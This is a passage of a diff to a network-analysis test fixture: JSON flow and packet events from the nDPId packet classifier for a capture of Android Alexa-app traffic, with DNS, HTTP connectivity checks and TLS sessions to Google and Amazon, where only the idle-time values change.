{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027733,"flow_last_seen":1490976027733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1490976027733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027733,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c0BAAEAGOiysECrYrNkJjorUAFAegTplAAAAAKAC\/\/+MiQAAAgQFtAQCCAoA9kklAAAAAAEDAwg="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027733,"flow_last_seen":1490976027733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1490976027733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027733,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c0BAAEAGOiysECrYrNkJjorUAFAegTplAAAAAKAC\/\/+MiQAAAgQFtAQCCAoA9kklAAAAAAEDAwg="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1490976027741,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976027741,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1490976027776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027776,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8g+MAADQGdYms2QmOrBAq2ABQitTVYWKuHoE6ZqASpahLiwAAAgQFZAQCCApVvw3GAPZJJQEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1490976027777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027777,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c0FAAEAGOjOsECrYrNkJjorUAFAegTpm1WFir4AQAVceVQAAAQEICgD2SSlVvw3G"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1490976027776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027776,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8g+MAADQGdYms2QmOrBAq2ABQitTVYWKuHoE6ZqASpahLiwAAAgQFZAQCCApVvw3GAPZJJQEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1490976027777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027777,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c0FAAEAGOjOsECrYrNkJjorUAFAegTpm1WFir4AQAVceVQAAAQEICgD2SSlVvw3G"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1490976027958,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976027958,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQaiwAAEABYsesECoBrBAq2AUBiVKsECoqRQAANNZ6QAA\/BgDirBAq2K3C37ynfhRsXkGjCY7hdlaAEAFbkZsAAAEBCAoA9kk7K\/xGxA=="} 00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626} @@ -73,48 +73,48 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1490976029244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976029244,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90PZAAEARvD+sECoBrBAq2AA1vBsAqWPAqIqBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAToAAoDd3d3A2NkbsAQwCwABQABAAAABgAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAQABDRV0cXAQgABAAEAAAAEAAQ0VdGPwEIAAQABAAAABAAENFXR2MBCAAEAAQAAAAQABDRV0Xo="} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029248,"flow_last_seen":1490976029248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029248,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1490976029248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029248,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xDtAAEAGmX2sECrYNFXRxdfKAbvTso2HAAAAAKAC\/\/\/liQAAAgQFtAQCCAoA9km8AAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1490976029325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029325,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqrg0VdHFrBAq2AG718qLhBMS07KNiKAScSCB1QAAAgQFtAQCCAptCebiAPZJvAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1490976029328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976029328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xDxAAEAGmYSsECrYNFXRxdfKAbvTso2Ii4QTE4AQAVcgZAAAAQEICgD2ScRtCebi"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029248,"flow_last_seen":1490976029248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029248,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1490976029248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029248,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xDtAAEAGmX2sECrYNFXRxdfKAbvTso2HAAAAAKAC\/\/\/liQAAAgQFtAQCCAoA9km8AAAAAAEDAwg="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1490976029325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029325,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqrg0VdHFrBAq2AG718qLhBMS07KNiKAScSCB1QAAAgQFtAQCCAptCebiAPZJvAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1490976029328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976029328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xDxAAEAGmYSsECrYNFXRxdfKAbvTso2Ii4QTE4AQAVcgZAAAAQEICgD2ScRtCebi"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1490976029669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1490976029669,"pkt":"AMDKkaPvePiC0\/vCCABFAABGWk9AAEARM16sECrYrBAqAU3\/ADUAMlRV5qsBAAABAAAAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQAB"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1490976029753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976029753,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw0QhAAEARvHqsECoBrBAq2AA1Tf8AXGjL5quBgAABAAIAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQABwAwABQABAAACoQAOBG1hZHMGYW1hem9uwCHANgABAAEAAAAGAAQ0XugA"} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029756,"flow_last_seen":1490976029756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029756,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1490976029756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029756,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YepAAEAG5YqsECrYNF7oAIMUAbsV\/ygFAAAAAKAC\/\/9G\/wAAAgQFtAQCCAoA9knvAAAAAAEDAwg="} 